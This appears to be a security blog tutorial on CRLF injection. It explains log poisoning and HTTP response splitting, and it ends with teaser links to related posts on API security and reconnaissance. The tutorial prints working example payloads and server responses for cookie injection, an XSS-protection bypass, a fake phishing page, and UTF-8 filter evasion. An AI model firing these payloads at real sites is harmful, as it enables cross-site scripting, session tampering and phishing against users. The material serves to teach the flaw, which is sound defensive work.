CRLF injection is a vulnerability that lets a malicious hacker inject carriage return (CR) and linefeed (LF) characters to change the way a web application works or to confuse its administrator. There are two main malicious uses for CRLF injections: log poisoning (also called log injection, log splitting, or log forging) and HTTP response splitting
The term CRLF refers to Carriage Return (ASCII 13, r) Line Feed (ASCII 10, n). They’re used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
A CRLF Injection attack occurs when a malicious user successfully inserts CRLF sequences into an application, typically by modifying HTTP parameters or URLs. Once injected, these characters can lead to various exploitations, including log poisoning and HTTP response manipulation.
Log Poisoning: In a log poisoning attack, malicious actors inject CRLF characters into web server log files. This action aims to confuse both automated log analysis systems and manual log reviewers, potentially leading to further exploitation.
HTTP Response Splitting: HTTP response splitting occurs when attackers manipulate HTTP responses by injecting CRLF sequences. This manipulation can lead to a range of attacks, including XSS bypasses and content injection.
In this scenario, a malicious user injects a CRLF sequence to add a cookie to the HTTP response. By manipulating the URL parameters, the attacker forces the server to include a malicious cookie in the response headers.
Request:
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalueResponse:
Connection: keep-alive
Content-Length: 178
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Location: https://www.example.net/[INJECTION STARTS HERE]
Set-Cookie: mycookie=myvalue
X-Frame-Options: SAMEORIGIN
X-Sucuri-ID: 15016
x-content-type-options: nosniff
x-xss-protection: 1; mode=blockSimilar to the previous example, this exploit involves injecting a CRLF sequence to add a cookie. However, in this case, the attacker also bypasses XSS protection mechanisms by injecting a malicious script payload.
Request:
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2eResponse:
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://example.com/[INJECTION STARTS HERE]
Content-Length:35
X-XSS-Protection:0
23
<svg onload=alert(document.domain)>
0Here, the attacker injects a CRLF sequence to manipulate the HTTP response and inject custom HTML content. This can lead to various attacks, including phishing attempts and content spoofing.
Request:
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3EResponse:
Set-Cookie:en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34
<html>You have been Phished</html>Using UTF-8 encoding, the attacker evades filters by injecting encoded CRLF characters. This technique allows them to inject malicious content into the response headers, potentially leading to further exploitation.
Request:
http://www.example.net/index.php?lang=%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BEResponse:
Set-Cookie:en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34
<html>You have been Phished</html>Remainder:
%E5%98%8A = %0A = \u560a
%E5%98%8D = %0D = \u560d
%E5%98%BE = %3E = \u563e (>)
%E5%98%BC = %3C = \u563c (<)Log poisoning, a subset of CRLF injection attacks, involves injecting CRLF characters into web server log files. By doing so, attackers aim to confuse log analysis systems and system administrators browsing the logs manually. This confusion can lead to overlooking malicious activities or misinterpreting log data.
In this example, a malicious user injects CRLF characters into a web server log file, causing confusion in the log analysis process. By injecting fake HTTP response headers and altering response data, the attacker can manipulate log entries and potentially evade detection.
http://www.example.com/example.php?id= – starting a valid request to a page with a CRLF injection vulnerability.
%0d%0aContent-Length:%200 – a fake HTTP response header of Content-Length: 0. This causes the web browser to treat this response as terminated and start parsing the next response.
%0d%0a%0d%0aHTTP/1.1%20200%20OK – the injected new response begins here with a double CRLF sequence followed by HTTP/1.1 200 OK.
%0d%0aContent-Type:%20text/html – another fake HTTP response header: Content-Type: text/html. This is required for the browser to treat this data as HTML content.
%0d%0aContent-Length:%2025 – yet another fake HTTP response header: Content-Length: 25. This instructs the browser to parse only the next 25 bytes and discard any remaining data as junk, causing it to ignore the legitimate HTTP content sent by the web server.
%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E – a double CRLF sequence signals that the headers are over and the response body starts. The injected page content is <script>alert(1)</script>, which causes the user’s browser to display an alert instead of the actual example.php page.To learn more about CRLF injection and related web security vulnerabilities, refer to the following resources:
For hands-on experience and advanced learning, you can explore labs provided by platforms like PortSwigger, which offer scenarios to practice and understand CRLF injection and related techniques.
To understand APIs, it’s necessary to understand how websites function. Websites rely on a set of languages and technologies to deliver content and functionality to users online, while APIs allow interaction with these websites and handling of the data and functions they provide. first structure : first structure ( Normal) 1 -request send to server […]
Read More
Remember that, most of the time, you don’t have to be a master programmer to conduct a code review in a particular language, As long as you understand one programming language, you can apply your intuition to review a wide variety of software written in different languages.However, understanding the target’s particular language and architecture will […]
Read More
Understanding Broken Object Level Authorization (BOLA) in APIs Introduction Broken Object Level Authorization (BOLA) is a critical security vulnerability affecting APIs. This flaw allows attackers to access data or actions that they are not authorized to access by simply manipulating resource identifiers within API requests. This article will explore the mechanics of BOLA, its potential […]
Read More
In today’s interconnected digital landscape, Application Programming Interfaces (APIs) play a pivotal role in facilitating seamless communication and data exchange between various software systems. However, their widespread usage also renders them susceptible to a myriad of security threats. To fortify against these vulnerabilities, it’s imperative to delve into the nuances of API security, including the […]
Read More
Subdomain Enumeration Subdomain Enumeration Effective subdomain enumeration helps discover hidden or forgotten subdomains, reducing the likelihood of others finding and reporting bugs, and thereby minimizing duplicate bug reports. Identifying applications running on these subdomains can uncover critical vulnerabilities. For large organizations, subdomain enumeration reveals the services exposed to the internet, which is crucial during internal […]
Read More
Sallam